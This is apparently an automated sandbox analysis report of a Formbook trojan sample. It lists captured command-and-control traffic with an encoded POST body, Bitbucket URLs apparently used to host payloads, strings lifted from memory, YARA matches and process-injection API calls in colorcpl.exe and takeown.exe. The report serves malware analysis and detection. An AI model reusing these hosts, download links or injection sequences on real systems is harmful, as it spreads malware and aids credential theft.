Source: unknown | HTTP traffic detected: POST /dc1u/ HTTP/1.1 | Host: www.facaicloud.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Origin: http://www.facaicloud.top | Content-Length: 219 | Cache-Control: max-age=0 | Connection: close | Content-Type: application/x-www-form-urlencoded | Referer: http://www.facaicloud.top/dc1u/ | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800) | Data Ascii: fvM8Gh=SHIpoeY+STTSk5h3jj3iRXtns3Dg94CaMfKjUVdbtAmkHyXBWe/Bx3NKkRJR5Iz/1MzYvdLCtFw9tjcllbRHiVC5HLDaQpECBWSmY3QrJzKCJ0xm8tLXqb7LDKcSwY6XHsANJgiAxDcJbvHWvvnuXQn8e7AeAA8I+qAKyMEasXp6wJpB53INk+b1gHj4mZWXlljlhCxQOECsht8tWQ==
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:03:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:03:29 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:03:32 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:03:34 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cd104a-b96"
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:03:41 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a72cd5-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:03:44 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a72cd5-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:03:46 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a72cd5-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:03:50 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a72cd5-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:03:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:03:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:04:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 23 Oct 2024 05:04:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close
Source: ObMmiCfBgqmt.exe, 0000000E.00000002.2494174819.0000000004C92000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.lotus9.life
Source: ObMmiCfBgqmt.exe, 0000000E.00000002.2494174819.0000000004C92000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.lotus9.life/t67j/
Source: z10982283782.exe, z10982283782.exe, 00000000.00000003.1236423933.0000000002900000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236633827.000000007F8FF000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1351975173.00000000028F7000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1416330856.000000007FA2F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.pmail.com
Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
Source: z10982283782.exe, 00000000.00000003.1283909227.000000000073D000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1284189717.0000000000778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paa
Source: z10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paaF
Source: z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paaj
Source: z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1283864027.0000000000779000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: z10982283782.exe, 00000000.00000002.1349705581.000000000074E000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000752000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: z10982283782.exe, 00000000.00000003.1283909227.000000000073D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/%
Source: z10982283782.exe, 00000000.00000002.1385371181.00000000215EC000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1385371181.00000000215EA000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000733000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-
Source: z10982283782.exe, 00000000.00000002.1349705581.000000000074E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/S
Source: z10982283782.exe, 00000000.00000002.1349705581.0000000000777000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2
Source: z10982283782.exe, 00000000.00000003.1283909227.0000000000727000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1349705581.000000000072D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/Q
Source: z10982283782.exe, 00000000.00000002.1384175614.00000000209E8000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1349705581.00000000006EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/akeem4u/canter/downloads/233_Ltspwqrtysw
Source: z10982283782.exe, 00000000.00000002.1349705581.00000000006EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/akeem4u/canter/downloads/233_LtspwqrtyswX
Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cookielaw.org/
Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1283864027.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: takeown.exe, 0000000D.00000002.2488818800.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: takeown.exe, 0000000D.00000003.1712574823.0000000007720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.cpamerix.online&rand=
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
              Source: z10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.
              Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
              Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
              Source: z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1283864027.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.cpamerix.online&utm_medium=parking&utm_campaign=s_land_
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.cpamerix.online&utm_medium=parking&utm_campaign=s_land
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.cpamerix.online&utm_medium=parking&utm_campaign=s_land_ho
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
              Source: takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.cpamerix.online&amp;reg_source=parking_auto
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.3.65:443 -> 192.168.2.7:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.3.65:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 54.231.236.129:443 -> 192.168.2.7:49713 version: TLS 1.2

              E-Banking Fraud

              Source: Yara match | File source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AAB118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx, | 0_2_02AAB118
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA7A2C NtAllocateVirtualMemory, | 0_2_02AA7A2C
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA7D78 NtWriteVirtualMemory, | 0_2_02AA7D78
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, | 0_2_02AADD70
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA7A2A NtAllocateVirtualMemory, | 0_2_02AA7A2A
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AADBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, | 0_2_02AADBB0
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AADC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, | 0_2_02AADC8C
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AADC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, | 0_2_02AADC04
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA8D6E GetThreadContext,SetThreadContext,NtResumeThread, | 0_2_02AA8D6E
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA8D70 GetThreadContext,SetThreadContext,NtResumeThread, | 0_2_02AA8D70
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_0661C3C3 NtClose, | 10_2_0661C3C3
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_065FA775 NtMapViewOfSection, | 10_2_065FA775
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762B60 NtClose,LdrInitializeThunk, | 10_2_22762B60
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762C70 NtFreeVirtualMemory,LdrInitializeThunk, | 10_2_22762C70
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762DF0 NtQuerySystemInformation,LdrInitializeThunk, | 10_2_22762DF0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227635C0 NtCreateMutant,LdrInitializeThunk, | 10_2_227635C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22764340 NtSetContextThread, | 10_2_22764340
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22764650 NtSuspendThread, | 10_2_22764650
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762AF0 NtWriteFile, | 10_2_22762AF0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762AD0 NtReadFile, | 10_2_22762AD0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762AB0 NtWaitForSingleObject, | 10_2_22762AB0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762BF0 NtAllocateVirtualMemory, | 10_2_22762BF0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762BE0 NtQueryValueKey, | 10_2_22762BE0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762BA0 NtEnumerateValueKey, | 10_2_22762BA0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762B80 NtQueryInformationFile, | 10_2_22762B80
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762E30 NtWriteVirtualMemory, | 10_2_22762E30
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762EE0 NtQueueApcThread, | 10_2_22762EE0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762EA0 NtAdjustPrivilegesToken, | 10_2_22762EA0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762E80 NtReadVirtualMemory, | 10_2_22762E80
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762F60 NtCreateProcessEx, | 10_2_22762F60
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762F30 NtCreateSection, | 10_2_22762F30
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762FE0 NtCreateFile, | 10_2_22762FE0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762FB0 NtResumeThread, | 10_2_22762FB0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762FA0 NtQuerySection, | 10_2_22762FA0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762F90 NtProtectVirtualMemory, | 10_2_22762F90
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762C60 NtCreateKey, | 10_2_22762C60
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762C00 NtQueryInformationProcess, | 10_2_22762C00
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762CF0 NtOpenProcess, | 10_2_22762CF0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762CC0 NtQueryVirtualMemory, | 10_2_22762CC0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762CA0 NtQueryInformationToken, | 10_2_22762CA0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762D30 NtUnmapViewOfSection, | 10_2_22762D30
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762D10 NtMapViewOfSection, | 10_2_22762D10
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762D00 NtSetInformationFile, | 10_2_22762D00
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762DD0 NtDelayExecution, | 10_2_22762DD0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762DB0 NtEnumerateKey, | 10_2_22762DB0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22763010 NtOpenDirectoryObject, | 10_2_22763010
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22763090 NtSetValueKey, | 10_2_22763090
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227639B0 NtGetContextThread, | 10_2_227639B0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22763D70 NtOpenThread, | 10_2_22763D70
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22763D10 NtOpenProcessToken, | 10_2_22763D10
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03094340 NtSetContextThread,LdrInitializeThunk, | 13_2_03094340
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03094650 NtSuspendThread,LdrInitializeThunk, | 13_2_03094650
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092B60 NtClose,LdrInitializeThunk, | 13_2_03092B60
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092BA0 NtEnumerateValueKey,LdrInitializeThunk, | 13_2_03092BA0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092BE0 NtQueryValueKey,LdrInitializeThunk, | 13_2_03092BE0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092BF0 NtAllocateVirtualMemory,LdrInitializeThunk, | 13_2_03092BF0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092AD0 NtReadFile,LdrInitializeThunk, | 13_2_03092AD0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092AF0 NtWriteFile,LdrInitializeThunk, | 13_2_03092AF0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092F30 NtCreateSection,LdrInitializeThunk, | 13_2_03092F30
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092FB0 NtResumeThread,LdrInitializeThunk, | 13_2_03092FB0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092FE0 NtCreateFile,LdrInitializeThunk, | 13_2_03092FE0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092E80 NtReadVirtualMemory,LdrInitializeThunk, | 13_2_03092E80
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092EE0 NtQueueApcThread,LdrInitializeThunk, | 13_2_03092EE0
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092D10 NtMapViewOfSection,LdrInitializeThunk, | 13_2_03092D10
              Source: C:\Windows\SysWOW64\takeown.exe | Code function: 13_2_03092D30 NtUnmapViewOfSection,LdrInitializeThunk, | 13_2_03092D30
